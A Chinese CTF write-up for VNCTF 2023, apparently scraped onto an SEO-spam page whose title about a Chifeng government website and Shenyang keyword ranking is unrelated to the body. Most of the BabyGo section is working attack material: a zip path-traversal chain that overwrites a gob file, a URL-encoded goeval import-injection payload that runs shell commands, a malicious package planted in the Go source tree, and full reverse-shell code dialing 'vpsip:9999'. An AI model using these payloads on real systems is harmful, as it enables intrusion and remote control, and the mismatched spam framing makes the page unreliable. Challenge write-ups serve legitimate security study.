当前位置：首页 > news >正文

赤峰市政府信息网站建设沈阳关键词seo排名

news 2025/8/21 19:07:37

赤峰市政府信息网站建设,沈阳关键词seo排名,四川省住房建设厅官方网站,排版设计模板免费from http://v2ish1yan.top/2023/02/19/%E6%AF%94%E8%B5%9Bwp/2023vnctf/ 比赛的时候在回学校的路上，所以没有打，听说质量挺高，赛后做一下象棋王子一个普通的js游戏，玩过关了就给flag，所以flag肯定在前端源码里这…

from http://v2ish1yan.top/2023/02/19/%E6%AF%94%E8%B5%9Bwp/2023vnctf/
比赛的时候在回学校的路上，所以没有打，听说质量挺高，赛后做一下

象棋王子

一个普通的js游戏，玩过关了就给flag，所以flag肯定在前端源码里

这里就是弹flag的js，只不过被混淆了，直接复制到控制台执行就行

BabyGo

0x00 前言

这题在机场等同学的时候做了一下，但是那个解压功能一直报错，我还以为是我的问题，结构第二天做一下发现是可以的

goeval代码注入
filepath.Clean构造任意解压路径

0x01 源码分析

package mainimport ("encoding/gob""fmt""github.com/PaulXu-cn/goeval""github.com/duke-git/lancet/cryptor""github.com/duke-git/lancet/fileutil""github.com/duke-git/lancet/random""github.com/gin-contrib/sessions""github.com/gin-contrib/sessions/cookie""github.com/gin-gonic/gin""net/http""os""path/filepath""strings"
)type User struct {Name  stringPath  stringPower string
}func main() {r := gin.Default()store := cookie.NewStore(random.RandBytes(16))r.Use(sessions.Sessions("session", store))r.LoadHTMLGlob("template/*")r.GET("/", func(c *gin.Context) {userDir := "/tmp/" + cryptor.Md5String(c.ClientIP()+"VNCTF2023GoGoGo~") + "/"session := sessions.Default(c)session.Set("shallow", userDir)session.Save()fileutil.CreateDir(userDir)gobFile, _ := os.Create(userDir + "user.gob")user := User{Name: "ctfer", Path: userDir, Power: "low"}encoder := gob.NewEncoder(gobFile)encoder.Encode(user)if fileutil.IsExist(userDir) && fileutil.IsExist(userDir+"user.gob") {c.HTML(200, "index.html", gin.H{"message": "Your path: " + userDir})return}c.HTML(500, "index.html", gin.H{"message": "failed to make user dir"})})r.GET("/upload", func(c *gin.Context) {c.HTML(200, "upload.html", gin.H{"message": "upload me!"})})r.POST("/upload", func(c *gin.Context) {session := sessions.Default(c)if session.Get("shallow") == nil {c.Redirect(http.StatusFound, "/")}userUploadDir := session.Get("shallow").(string) + "uploads/"fileutil.CreateDir(userUploadDir)file, err := c.FormFile("file")if err != nil {c.HTML(500, "upload.html", gin.H{"message": "no file upload"})return}ext := file.Filename[strings.LastIndex(file.Filename, "."):]if ext == ".gob" || ext == ".go" {c.HTML(500, "upload.html", gin.H{"message": "Hacker!"})return}filename := userUploadDir + file.Filenameif fileutil.IsExist(filename) {fileutil.RemoveFile(filename)}err = c.SaveUploadedFile(file, filename)if err != nil {c.HTML(500, "upload.html", gin.H{"message": "failed to save file"})return}c.HTML(200, "upload.html", gin.H{"message": "file saved to " + filename})})r.GET("/unzip", func(c *gin.Context) {session := sessions.Default(c)if session.Get("shallow") == nil {c.Redirect(http.StatusFound, "/")}userUploadDir := session.Get("shallow").(string) + "uploads/"files, _ := fileutil.ListFileNames(userUploadDir)destPath := filepath.Clean(userUploadDir + c.Query("path"))for _, file := range files {if fileutil.MiMeType(userUploadDir+file) == "application/zip" {err := fileutil.UnZip(userUploadDir+file, destPath)if err != nil {c.HTML(200, "zip.html", gin.H{"message": "failed to unzip file"})return}fileutil.RemoveFile(userUploadDir + file)}}c.HTML(200, "zip.html", gin.H{"message": "success unzip"})})r.GET("/backdoor", func(c *gin.Context) {session := sessions.Default(c)if session.Get("shallow") == nil {c.Redirect(http.StatusFound, "/")}userDir := session.Get("shallow").(string)if fileutil.IsExist(userDir + "user.gob") {file, _ := os.Open(userDir + "user.gob")decoder := gob.NewDecoder(file)var ctfer Userdecoder.Decode(&ctfer)if ctfer.Power == "admin" {eval, err := goeval.Eval("", "fmt.Println(\"Good\")", c.DefaultQuery("pkg", "fmt"))if err != nil {fmt.Println(err)}c.HTML(200, "backdoor.html", gin.H{"message": string(eval)})return} else {c.HTML(200, "backdoor.html", gin.H{"message": "low power"})return}} else {c.HTML(500, "backdoor.html", gin.H{"message": "no such user gob"})return}})r.Run(":80")
}

总体来说不是太难理解

/路由，生成一个userDir并保存在Session里，后面的部分都会从Session取这个的值进行操作
并且还会创建一个user.gob文件，将User信息保存在里面

/upload路由，将文件上传到userDir+"uploads/"目录，并且会检测文件后缀

/unzip路由，会对userDir+"uploads/"目录里的zip文件进行解压，且目的路径可控，接受GET传参的path的值

destPath := filepath.Clean(userUploadDir + c.Query("path"))

然后来看看这个filepath.Clean是什么东西

Clean通过纯词法处理返回与path相当的最短路径名称。它反复应用以下规则，直到不能再做进一步处理。

用一个元素替换多个Separator元素。

消除每个.路径名元素（当前目录）。

消除每个内部的…路径名称元素（父目录）和它前面的非…元素。

消除了将…放在根路径后面的情况（‘/…’)：也就是说，假设Separator是’/'，在一个路径的开头用"/“替换”/…"。

返回的路径只有在代表根目录时才以斜线结尾，例如Unix系统中的"/"或Windows系统中的C:

最后，任何出现的斜线都被Separator替换。

如果这个过程的结果是一个空字符串，Clean返回字符串"."。

from https://pkg.go.dev/path/filepath#Clean

所以我们可以构造路径，将文件解压到任何我们可以解压的地方

/backdoor路由，会从userDir目录读取user.gob文件的内容，并检测Power键的值是否为"admin"，如果为True，就执行

eval, err := goeval.Eval("", "fmt.Println(\"Good\")", c.DefaultQuery("pkg", "fmt"))

并返回执行结果

所以可以在本地构造一个user.gob，将Power的值改为"admin"并将其压缩，然后上传并解压到userDir目标覆盖原来的user.gob，这样就可以成功执行到goeval.Eval()了

而在goeval.Eval("", "fmt.Println(\"Good\")", c.DefaultQuery("pkg", "fmt"))里可以发现并没有可以直接执行任意代码的地方，可控的只有第三个参数

goeval.Eval()的第三参数可以进行包的导入，因为通过报错可以执行题目环境GO的src目录，所以我最开始想的是在fmt包里导入一个函数Println，这样在执行goeval.Eval()的时候就可以执行我们自己构造的代码。

但是我想少了，如果直接将pkg传参为fmt的话，因为在Println()被fmt包里的其他文件被定义过，所以我这再定义一个就会报错

然后我就随手搜了一下goeval.Eval，就发现了可以对goeval.Eval进行代码注入，从而远程执行代码

根据这篇文件去看看goeval.Eval的源码

func Eval(defineCode string, code string, imports ...string) (re []byte, err error) {var (tmp = `package main
%s
%s
func main() {
%s
}
`importStr stringfullCode stringnewTmpDir = tempDir + dirSeparator + RandString(8))if 0 < len(imports) {importStr = "import ("for _, item := range imports {if blankInd := strings.Index(item, " "); -1 < blankInd {importStr += fmt.Sprintf("\n %s \"%s\"", item[:blankInd], item[blankInd+1:])} else {importStr += fmt.Sprintf("\n\"%s\"", item)}}importStr += "\n)"}fullCode = fmt.Sprintf(tmp, importStr, defineCode, code)var codeBytes = []byte(fullCode)// 格式化输出的代码if formatCode, err := format.Source(codeBytes); nil == err {// 格式化失败，就还是用 content 吧codeBytes = formatCode}// 创建目录if err = os.Mkdir(newTmpDir, os.ModePerm); nil != err {return}defer os.RemoveAll(newTmpDir)// 创建文件tmpFile, err := os.Create(newTmpDir + dirSeparator + "main.go")if err != nil {return re, err}defer os.Remove(tmpFile.Name())// 代码写入文件tmpFile.Write(codeBytes)tmpFile.Close()// 运行代码cmd := exec.Command("go", "run", tmpFile.Name())res, err := cmd.CombinedOutput()return res, err
}

可以看出来，Eval是将代码写入一个临时文件然后运行再返回运行的结果，而且是以拼接的方式来写入代码

所以可以进行代码注入，用\t替代空格，同时由于他执行的是main内的代码，而且这个是写死的，所以得将要执行的代码写入init()里，这个函数会在main()前执行，然后使用var来闭合最后面的")

init函数特性

1.init函数可以在所有程序执行开始前被调用，并且每个包下可以有多个init函数
2.init函数先于main函数自动执行
3.每个包中可以有多个init函数，每个包中的源文件中也可以有多个init函数
4.init函数没有输入参数、返回值，也未声明，所以无法引用
5.不同包的init函数按照包导入的依赖关系决定执行顺序
6.无论包被导入多少次，init函数只会被调用一次，也就是只执行一次
7.init函数在代码中不能被显示的调用，不能被引用（赋值给函数变量），否则会出现编译错误
8.导入包不要出现循环依赖，这样会导致程序编译失败
9.Go程序仅仅想要用一个package的init执行，我们可以这样使用：import _ “test_xxxx”，导入包的时候加上下划线就ok了
10.包级别的变量初始化、init函数执行，这两个操作都是在同一个goroutine中调用的，按顺序调用，一次一个包
11.init函数不应该依赖任何在main函数里创建的变量，因为init函数的执行是在main函数之前的
12.在init函数中也可以启动goroutine，也就是在初始化的同时启动新的goroutine，这并不会影响初始化顺序
13.复杂逻辑不建议使用init函数，会增加代码的复杂性，可读性也会下降
14.一个源文件下可以有多个init函数，代码比较长时可以考虑分多个init函数
15.编程时不要依赖init的顺序

pkg := "os/exec\"\n\"fmt\"\n)\n\nfunc\tinit(){\ncmd:=exec.Command(\"ls\")\nout,_:=cmd.CombinedOutput()\nfmt.Println(string(out))\n}\nvar(\na=\"1"
goeval.Eval("", "fmt.Println(\"Good\")", pkg)

就会执行

package mainimport (
"os/exec"
"fmt"
)func	init(){
cmd:=exec.Command("ls")
out,_:=cmd.CombinedOutput()
fmt.Println(string(out))
}
var(
a="1"
)func main() {
fmt.Println("Good")
}

0x02 题解

方法一代码注入

先在本地创建一个user.gob文件，就跟源码里的方式一样建一个再压缩

然后上传文件，再解压缩文件

解压缩的url为

/unzip?path=../../../../tmp/49c69cef49dc4b3be71e988a20149ca7

然后访问/backdoor路由，进行代码注入，远程执行命令

payload

/backdoor?pkg=os%2Fexec%22%0A%22fmt%22%0A%29%0A%0Afunc%09init%28%29%7B%0Acmd%3A%3Dexec.Command%28%22cat%22%2C%22%2Fffflllaaaggg%22%29%0Aout%2C_%3A%3Dcmd.CombinedOutput%28%29%0Afmt.Println%28string%28out%29%29%0A%7D%0Avar%28%0Aa%3D%221

方法二使用别名执行自己的包

这是我在写wp的时候发现的另一个方法

看一下Eval对第三个参数的区别处理

for _, item := range imports {if blankInd := strings.Index(item, " "); -1 < blankInd {importStr += fmt.Sprintf("\n %s \"%s\"", item[:blankInd], item[blankInd+1:])} else {importStr += fmt.Sprintf("\n\"%s\"", item)}
}

eg:

goeval.Eval("", "fmt.Println(\"Good\")", "fmt os/exec")

就会变成

package mainimport (fmt "os/exec"
)func main() {
fmt.Println("Good")
}

相当于给导入的包设置一个别名,所以可以将我们自己的包设置别名为fmt，从而执行任意代码

自己建立的包

PrintLn.go

package v2iimport ("fmt""os/exec"
)
func Println(a string){_=acmd:=exec.Command("ls", "/")out,_:=cmd.CombinedOutput()fmt.Println(string(out))
}

将文件压缩，然后上传，解压到/usr/local/go/src/v2i

路径在报错里看到

/unzip?path=../../../../usr/local/go/src/v2i

然后在/backdoor路由

/backdoor?pkg=fmt v2i

这样就执行了我们的代码，但是有点麻烦，得不断上传解压缩

但也可以试试反弹shell，如果要反弹shell的话，自己建的包就得是【从网上抄的代码XD】

package v2i
import ("io""net""io/ioutil""log""os/exec"
)var (cmd stringline string
)func Println(a string) {_=aaddr := "vpsip:9999" //远程连接主机名conn,err := net.Dial("tcp",addr) //拨号操作，用于连接服务端，需要指定协议。if err != nil {log.Fatal(err)}buf := make([]byte,10240) //定义一个切片的长度是10240。for  {n,err := conn.Read(buf) //接受的命令if err != nil && err != io.EOF {  //io.EOF在网络编程中表示对端把链接关闭了。log.Fatal(err)}cmd_str := string(buf[:n])cmd := exec.Command("/bin/bash","-c",cmd_str) //命令执行stdout, err := cmd.StdoutPipe()if err != nil {log.Fatal(err)}defer stdout.Close()if err := cmd.Start(); err != nil {log.Fatal(err)}opBytes, err := ioutil.ReadAll(stdout)if err != nil {log.Fatal(err)}conn.Write([]byte(opBytes)) //返回执行结果}
}